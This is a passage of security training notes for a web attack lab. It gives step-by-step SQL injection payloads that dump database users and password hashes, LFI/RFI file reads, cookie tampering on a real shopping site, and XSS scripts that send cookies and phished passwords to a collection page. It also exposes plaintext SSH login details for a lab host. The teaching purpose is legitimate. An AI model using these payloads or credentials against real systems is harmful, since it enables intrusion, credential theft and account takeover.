  1859.  
  1860. Reference:
  1861. http://www.techonthenet.com/sql/union.php
  1862.  
  1863.  
  1864. ---------------------------Type This-----------------------------------
  1865.  
  1866. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  1867. -----------------------------------------------------------------------
  1868.  
  1869.  
  1870.  
  1871. Now we negate the parameter value 'acer' by turning into the word 'null':
  1872. ---------------------------Type This-----------------------------------
  1873.  
  1874. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  1875. -----------------------------------------------------------------------
  1876.  
  1877. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  1878.  
  1879.  
  1880. Use a cheat sheet for syntax:
  1881. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1882.  
  1883. ---------------------------Type This-----------------------------------
  1884.  
  1885. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  1886.  
  1887. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  1888.  
  1889. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  1890.  
  1891. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  1892.  
  1893.  
  1894. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  1895.  
  1896. -----------------------------------------------------------------------
  1897.  
  1898.  
  1899.  
  1900. ########################
  1901. # Question I get a lot #
  1902. ########################
  1903. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  1904.  
  1905. Here is a good reference for it:
  1906. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  1907.  
  1908. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  1909.  
  1910.  
  1911.  
  1912.  
  1913. #########################
  1914. # File Handling Attacks #
  1915. #########################
  1916.  
  1917. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  1918.  
  1919. ---------------------------Type This-----------------------------------
  1920.  
  1921. https://phpapp.infosecaddicts.com/showfile.php?filename=about.txt
  1922.  
  1923. -----------------------------------------------------------------------
  1924.  
  1925.  
  1926. See if you can read files on the file system:
  1927. ---------------------------Type This-----------------------------------
  1928.  
  1929. https://phpapp.infosecaddicts.com/showfile.php?filename=/etc/passwd
  1930. -----------------------------------------------------------------------
  1931.  
  1932. We call this attack a Local File Include or LFI.
  1933.  
  1934. Now let's find some text out on the internet somewhere:
  1935. https://www.gnu.org/software/hello/manual/hello.txt
  1936.  
  1937.  
  1938. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
  1939.  
  1940. ---------------------------Type This-----------------------------------
  1941.  
  1942. https://phpapp.infosecaddicts.com/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
  1943. -----------------------------------------------------------------------
  1944.  
  1945. #########################################################################################
  1946. # SQL Injection #
  1947. # https://phpapp.infosecaddicts.com/1-Intro_To_SQL_Intection.pptx #
  1948. #########################################################################################
  1949.  
  1950.  
  1951. - Another quick way to test for SQLI is to remove the paramter value
  1952.  
  1953.  
  1954. #############################
  1955. # Error-Based SQL Injection #
  1956. #############################
  1957. ---------------------------Type This-----------------------------------
  1958.  
  1959. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  1960. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  1961. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  1962. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  1963. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  1964. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  1965. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  1966. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  1967. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  1968.  
  1969. -----------------------------------------------------------------------
  1970.  
  1971.  
  1972.  
  1973. #############################
  1974. # Union-Based SQL Injection #
  1975. #############################
  1976.  
  1977. ---------------------------Type This-----------------------------------
  1978.  
  1979. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 100--
  1980. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 50--
  1981. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 25--
  1982. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 10--
  1983. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 5--
  1984. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 6--
  1985. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 7--
  1986. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 8--
  1987. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 9--
  1988. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  1989. -----------------------------------------------------------------------
  1990.  
  1991. We are using a union select statement because we are joining the developer's query with one of our own.
  1992. Reference:
  1993. http://www.techonthenet.com/sql/union.php
  1994. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  1995. It removes duplicate rows between the various SELECT statements.
  1996.  
  1997. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  1998.  
  1999. ---------------------------Type This-----------------------------------
  2000.  
  2001. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  2002. -----------------------------------------------------------------------
  2003.  
  2004. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  2005.  
  2006. ---------------------------Type This-----------------------------------
  2007.  
  2008. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  2009. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  2010. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  2011. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  2012.  
  2013. -----------------------------------------------------------------------
  2014.  
  2015.  
  2016.  
  2017.  
  2018. - Another way is to see if you can get the backend to perform an arithmetic function
  2019.  
  2020. ---------------------------Type This-----------------------------------
  2021.  
  2022. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(2)
  2023. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-2)
  2024. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-1)
  2025.  
  2026.  
  2027.  
  2028. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=1--
  2029. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=2--
  2030. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=1*1
  2031. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 >-1#
  2032. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<99#
  2033. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<>1#
  2034. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 2 != 3--
  2035. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 &0#
  2036.  
  2037.  
  2038.  
  2039. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=1--
  2040. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=2--
  2041. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='joe' and 1=1--
  2042. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='dbo' and 1=1--
  2043.  
  2044. -----------------------------------------------------------------------
  2045.  
  2046.  
  2047. ###############################
  2048. # Blind SQL Injection Testing #
  2049. ###############################
  2050. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  2051.  
  2052. 3 - Total Characters
  2053. ---------------------------Type This-----------------------------------
  2054.  
  2055. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  2056. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  2057. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  2058. -----------------------------------------------------------------------
  2059.  
  2060. Let's go for a quick check to see if it's DBO
  2061.  
  2062. ---------------------------Type This-----------------------------------
  2063.  
  2064. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  2065. -----------------------------------------------------------------------
  2066.  
  2067. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  2068.  
  2069. ---------------------------Type This-----------------------------------
  2070.  
  2071. D - 1st Character
  2072. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  2073. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  2074. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  2075. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  2076.  
  2077. B - 2nd Character
  2078. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2079. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2080.  
  2081. O - 3rd Character
  2082. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2083. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  2084. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2085. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2086. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  2087. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  2088. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2089.  
  2090. -----------------------------------------------------------------------
  2091.  
  2092.  
  2093.  
  2094.  
  2095.  
  2096.  
  2097.  
  2098. ################################
  2099. # Playing with session cookies #
  2100. ################################
  2101.  
  2102. -----------------------------------------------------------------------
  2103. Step 1: Browse to the shopping cart page NewEgg.com
  2104. -------------------Browse to this webpage in Firefox------------------------------
  2105. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2106. ----------------------------------------------------------------------------------
  2107.  
  2108.  
  2109.  
  2110. Step 2: View the current session ID
  2111. ---Type this over the shopping car URL in the address bar (don't paste it )---------
  2112. javascript:void(document.write(document.cookie))
  2113. ------------------------------------------------------------------------------------
  2114.  
  2115. You should see your session cookie and if you don't try again in a different browser
  2116.  
  2117.  
  2118.  
  2119. Step 3: Go back to the shopping cart page (click the back button)
  2120. ---------------------------------------------------------------------------------
  2121. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2122. ---------------------------------------------------------------------------------
  2123.  
  2124.  
  2125. Step 4: Now let's modify the session ID
  2126. ---Type this over the shopping car URL in the address bar (don't paste it )---------
  2127. javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
  2128. ------------------------------------------------------------------------------------
  2129.  
  2130.  
  2131.  
  2132. Step 5: Go back to the shopping cart page (click the back button)
  2133. ---------------------------------------------------------------------------------
  2134. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
  2135. ---------------------------------------------------------------------------------
  2136.  
  2137.  
  2138.  
  2139. Step 6: View the current session ID
  2140. ---Type this over the shopping car URL in the address bar (don't paste it )---------
  2141. javascript:void(document.write(document.cookie))
  2142. ------------------------------------------------------------------------------------
  2143.  
  2144. -----------------------------------------------------------------------
  2145.  
  2146. #########################################################
  2147. # What is XSS #
  2148. # https://phpapp.infosecaddicts.com/2-Intro_To_XSS.pptx #
  2149. #########################################################
  2150.  
  2151. OK - what is Cross Site Scripting (XSS)
  2152.  
  2153. 1. Use Firefox to browse to the following location:
  2154. ---------------------------Type This-----------------------------------
  2155.  
  2156. https://phpapp.infosecaddicts.com/xss_practice/
  2157. -----------------------------------------------------------------------
  2158.  
  2159. A really simple search page that is vulnerable should come up.
  2160.  
  2161.  
  2162.  
  2163.  
  2164. 2. In the search box type:
  2165. ---------------------------Type This-----------------------------------
  2166.  
  2167. <script>alert('So this is XSS')</script>
  2168. -----------------------------------------------------------------------
  2169.  
  2170.  
  2171. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  2172. Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
  2173.  
  2174.  
  2175. 3. In the search box type:
  2176. ---------------------------Type This-----------------------------------
  2177.  
  2178. <script>alert(document.cookie)</script>
  2179. -----------------------------------------------------------------------
  2180.  
  2181.  
  2182. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  2183. Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/
  2184.  
  2185. 4. Now replace that alert script with:
  2186. ---------------------------Type This-----------------------------------
  2187.  
  2188. <script>document.location="https://phpapp.infosecaddicts.com/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  2189. -----------------------------------------------------------------------
  2190.  
  2191.  
  2192. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  2193.  
  2194.  
  2195. 5. Now view the stolen cookie at:
  2196. ---------------------------Type This-----------------------------------
  2197.  
  2198. https://phpapp.infosecaddicts.com/xss_practice/cookie_stealer_logs.html
  2199. -----------------------------------------------------------------------
  2200.  
  2201.  
  2202. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  2203.  
  2204.  
  2205.  
  2206.  
  2207.  
  2208.  
  2209. ############################
  2210. # A Better Way To Demo XSS #
  2211. ############################
  2212.  
  2213.  
  2214. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  2215.  
  2216.  
  2217. Use Firefox to browse to the following location:
  2218. ---------------------------Type This-----------------------------------
  2219.  
  2220. https://phpapp.infosecaddicts.com/xss_practice/
  2221. -----------------------------------------------------------------------
  2222.  
  2223.  
  2224.  
  2225. Paste this in the search box
  2226. ----------------------------
  2227.  
  2228.  
  2229. ---------------------------Type This-----------------------------------
  2230.  
  2231. <script>
  2232. password=prompt('Your session is expired. Please enter your password to continue',' ');
  2233. document.write("<img src=\"https://phpapp.infosecaddicts.com/xss_practice/passwordgrabber.php?password=" +password+"\">");
  2234. </script>
  2235. -----------------------------------------------------------------------
  2236.  
  2237.  
  2238. Now view the stolen cookie at:
  2239. ---------------------------Type This-----------------------------------
  2240.  
  2241. https://phpapp.infosecaddicts.com/xss_practice/passwords.html
  2242.  
  2243. -----------------------------------------------------------------------
  2244.  
  2245.  
  2246.  
  2247. ###########################
  2248. # Mobile Malware Analysis #
  2249. ##########################
  2250. sudo apt install -y androguard android-platform-tools-base apktool split-select google-android-build-tools-installer
  2251.  
  2252. Open IDLE, and let's just dive right in.
  2253.  
  2254.  
  2255. - I prefer to use Putty to SSH into my Linux host.
  2256. - You can download Putty from here:
  2257. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  2258.  
  2259. Here is the information to put into putty
  2260.  
  2261. Host Name: 107.191.39.106
  2262. protocol: ssh
  2263. port: 22
  2264. username: sempra
  2265. password: semprapython3!
  2266.  
  2267.  
  2268.  
  2269.  
  2270. What is an APK?
  2271. An Android application is packaged as an APK ( Android Package ) file, which is essentially a ZIP file containing the compiled code, the resources, signature, manifest and every other file the software needs in order to run. Being it a ZIP file, we can start looking at its contents using the unzip command line utility ( or any other unarchiver you use ):
  2272.  
  2273. ---------------------------Type This-----------------------------------
  2274. cd android_malware
  2275. unzip application.apk -d yourname
  2276. -----------------------------------------------------------------------
  2277.  
  2278. Here’s what you will find inside an APK.
  2279.  
  2280. ---------------------------Type This-----------------------------------
  2281. cd yourname
  2282. ls
  2283. -----------------------------------------------------------------------
  2284.  
  2285. - AndroidManifest.xml (file)
  2286. This is the binary representation of the XML manifest file describing what permissions the application will request (keep in mind that some of the permissions might be requested at runtime by the app and not declared here), what activities ( GUIs ) are in there, what services ( stuff running in the background with no UI ) and what receivers ( classes that can receive and handle system events such as the device boot or an incoming SMS ).
  2287.  
  2288. Once decompiled (more on this later), it’ll look like this:
  2289.  
  2290. <?xml version="1.0" encoding="utf-8" standalone="no"?>
  2291. <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.company.appname"
  2292. platformBuildVersionCode="24"
  2293. platformBuildVersionName="7.0">
  2294. <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  2295. <uses-permission android:name="android.permission.INTERNET"/>
  2296.  
  2297. <application android:allowBackup="true" android:icon="@mipmap/ic_launcher"
  2298. android:label="@string/app_name"
  2299. android:supportsRtl="true" android:theme="@style/AppTheme">
  2300. <activity android:name="com.company.appname.MainActivity">
  2301. <intent-filter>
  2302. <action android:name="android.intent.action.MAIN"/>
  2303. <category android:name="android.intent.category.LAUNCHER"/>
  2304. </intent-filter>
  2305. </activity>
  2306. </application>
  2307.  
  2308. </manifest>
  2309. Keep in mind that this is the perfect starting point to isolate the application “entry points”, namely the classes you’ll reverse first in order to understand the logic of the whole software. In this case for instance, we would start inspecting the com.company.appname.MainActivity class being it declared as the main UI for the application.
  2310.  
  2311.  
  2312. ---------------------------Type This-----------------------------------
  2313. cd assets
  2314. ls
  2315. -----------------------------------------------------------------------
  2316. - assets/* ( folder )
  2317. This folder will contain application specific files, like wav files the app might need to play, custom fonts and so on. Reversing-wise it’s usually not very important, unless of course you find inside the software functional references to such files.
  2318.  
  2319.  
  2320. ---------------------------Type This-----------------------------------
  2321. cd ../res
  2322. ls
  2323. -----------------------------------------------------------------------
  2324.  
  2325.  
  2326. - res/* ( folder )
  2327. All the resources, like the activities xml files, images and custom styles are stored here.
  2328.  
  2329. ---------------------------Type This-----------------------------------
  2330. cd ../
  2331. ls
  2332. -----------------------------------------------------------------------
  2333.  
  2334.  
  2335. - resources.arsc ( file )
  2336. This is the “index” of all the resources, long story short, at each resource file is assigned a numeric identifier that the app will use in order to identify that specific entry and the resources.arsc file maps these files to their identifiers … nothing very interesting about it.
  2337.  
  2338. - classes.dex ( file )
  2339. This file contains the Dalvik ( the virtual machine running Android applications ) bytecode of the app, let me explain it better. An Android application is (most of the times) developed using the Java programming language. The java source files are then compiled into this bytecode which the Dalvik VM eventually will execute … pretty much what happens to normal Java programs when they’re compiled to .class files.
  2340.  
  2341. Long story short, this file contains the logic, that’s what we’re interested into.
  2342.  
  2343. Sometimes you’ll also find a classes2.dex file, this is due to the DEX format which has a limit to the number of classes you can declare inside a single dex file, at some point in history Android apps became bigger and bigger and so Google had to adapt this format, supporting a secondary .dex file where other classes can be declared.
  2344.  
  2345. From our perspective it doesn’t matter, the tools we’re going to use are able to detect it and append it to the decompilation pipeline.
  2346.  
  2347. - libs/ ( folder )
  2348. Sometimes an app needs to execute native code, it can be an image processing library, a game engine or whatever. In such case, those .so ELF libraries will be found inside the libs folder, divided into architecture specific subfolders ( so the app will run on ARM, ARM64, x86, etc ).
  2349.  
  2350.  
  2351. ---------------------------Type This-----------------------------------
  2352. cd META-INF/
  2353. ls
  2354. -----------------------------------------------------------------------
  2355.  
  2356.  
  2357.  
  2358. - META-INF/ ( folder )
  2359. Every Android application needs to be signed with a developer certificate in order to run on a device, even debug builds are signed by a debug certificate, the META-INF folder contains information about the files inside the APK and about the developer.
  2360.  
  2361. Inside this folder, you’ll usually find:
  2362.  
  2363. A MANIFEST.MF file with the SHA-1 or SHA-256 hashes of all the files inside the APK.
  2364. A CERT.SF file, pretty much like the MANIFEST.MF, but signed with the RSA key.
  2365. A CERT.RSA file which contains the developer public key used to sign the CERT.SF file and digests.
  2366. Those files are very important in order to guarantee the APK integrity and the ownership of the code. Sometimes inspecting such signature can be very handy to determine who really developed a given APK. If you want to get information about the developer, you can use the openssl command line utility:
  2367.  
  2368. ---------------------------Type This-----------------------------------
  2369. openssl pkcs7 -in CERT.RSA -inform DER -print
  2370. -----------------------------------------------------------------------
  2371. This will print an output like:
  2372.  
  2373. PKCS7:
  2374. type: pkcs7-signedData (1.2.840.113549.1.7.2)
  2375. d.sign:
  2376. version: 1
  2377. md_algs:
  2378. algorithm: sha1 (1.3.14.3.2.26)
  2379. parameter: NULL
  2380. contents:
  2381. type: pkcs7-data (1.2.840.113549.1.7.1)
  2382. d.data: <ABSENT>
  2383. cert:
  2384. cert_info:
  2385. version: 2
  2386. serialNumber: 10394279457707717180
  2387. signature:
  2388. algorithm: sha1WithRSAEncryption (1.2.840.113549.1.1.5)
  2389. parameter: NULL
  2390. issuer: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
  2391. validity:
  2392. notBefore: Jul 8 11:39:39 2013 GMT
  2393. notAfter: Nov 23 11:39:39 2040 GMT
  2394. subject: C=TW, ST=Taiwan, L=Taipei, O=ASUS, OU=PMD, CN=ASUS AMAX Key/emailAddress=admin@asus.com
  2395. key:
  2396. algor:
  2397. algorithm: rsaEncryption (1.2.840.113549.1.1.1)
  2398. parameter: NULL
  2399. public_key: (0 unused bits)
  2400. ...
  2401. ...
  2402. ...
  2403. This can be gold for us, for instance we could use this information to determine if an app was really signed by (let’s say) Google or if it was resigned, therefore modified, by a third party.
  2404.  
  2405. ---------------------------Type This-----------------------------------
  2406. sh /home/sempra/dex2jar-2.0/d2j-dex2jar.sh classes.dex
  2407. ------------------------------------------------------
  2408.  
  2409.  
  2410. Download via SCP the classes.dex.jar file to your local machine. Then install JD-GUI
Add Comment
Please, Sign In to add comment